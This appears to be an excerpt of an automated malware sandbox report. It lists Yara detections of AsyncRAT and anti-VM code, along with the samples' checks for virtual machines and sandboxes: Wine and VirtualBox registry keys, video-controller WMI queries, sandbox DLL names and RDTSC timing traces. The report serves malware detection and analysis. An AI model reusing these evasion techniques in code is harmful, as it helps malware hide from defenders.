Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000E.00000002.4661857196.000000000324D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vQeyqr1.exe PID: 6500, type: MEMORYSTR

Yara detected AsyncRAT

Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vQeyqr1.exe.1e610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_2-9913

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1018895001\RzAAR0y.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1018901001\950932ab59.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vQeyqr1.exe, 0000000E.00000002.4661857196.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vQeyqr1.exe, 0000000E.00000002.4777458351.000000001E610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: vQeyqr1.exe, 0000000E.00000002.4778915150.000000001E730000.00000004.08000000.00040000.00000000.sdmp, vQeyqr1.exe, 0000000E.00000000.2971558545.0000000000CA2000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: SBIEDLL.DLLCUAX9TQSFXQTYTRIMERTUG0XDL7QVZLW0LCF66FKMMCWMC4DSB2A6FUM0U0G83YILJEUCEFRZHDNF6HBC7BLW1KFKPIJGZQ7ONYTMHCSXAYATNBUIIW0ZFTWWLN7RNYPJOE3TPXUCM4MGIWJWJ3S6TIDEAWOVFIREFZKC5TDPRCBDLRJWKH2XORYMSM6BQYL8RL3QW1CGOYLCESGCJTKPS6Z4XDZQJWHGMCXDBQAV8KNPFCRBRACONBC45HYG3KJD2SCYBKVW07CRB1QCZUNGZISW3X4B20RIEDD373KDCBMZFVZMZCFO4GOLD8XMXYKITBIFKCDNJDY5IPRNM5MC0CLE7QUP5YCKBAKSCBAWHTJH26BWJ5DLBCBNRFH2CQEVMKCCTCPEPV0FB8RKFFK0BE7CNDT6DJTBQKWVDEIIPOGSJ7YB5ZUV7VWE4CPZ7VASNUUHFFMGJQSOLTH441ZELIXIRCRCUEEFLESNEXHBWT982K62KIGWYUPF8G7BGCOWRLAMTZFGCE9WMWQBE3FBYYIUHGGXALYINFO

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDEF23 second address: EDEF56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2385F9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDEF56 second address: EDEF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106368C second address: 1063690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10528AD second address: 10528B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10528B1 second address: 10528C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F08ED2385E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10528C1 second address: 10528D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F08ED2F2E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007F08ED2F2E86h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062638 second address: 106266B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F4h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jng 00007F08ED2385E6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007F08ED2385E6h 0x0000001e jnc 00007F08ED2385E6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062955 second address: 106297C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F08ED2F2EA3h 0x0000000a jo 00007F08ED2F2E86h 0x00000010 jmp 00007F08ED2F2E97h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062C70 second address: 1062C76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1062C76 second address: 1062C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065546 second address: 106554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106554A second address: 1065561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E93h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10655A7 second address: 10655AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065715 second address: 1065719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
